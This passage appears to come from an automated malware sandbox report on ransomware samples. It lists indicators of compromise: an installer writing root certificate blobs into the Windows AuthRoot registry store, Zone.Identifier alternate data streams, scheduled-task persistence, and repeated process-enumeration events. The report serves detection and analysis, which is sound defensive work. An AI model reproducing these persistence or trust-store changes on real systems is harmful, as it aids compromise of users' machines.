y_installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E y_installer.exe -
NTFS ADS 4 IoCs
Processes:
cmd.execmd.execmd.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exedescription ioc process File created C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe:Zone.Identifier cmd.exe File created C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier cmd.exe File opened for modification C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier cmd.exe File created C:\Users\Admin\AppData\Local\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe\:Zone.Identifier:$DATA HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 7836 schtasks.exe 8964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exetaskmgr.exepowershell.exepid process 1704 taskmgr.exe 1704 taskmgr.exe 1704 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 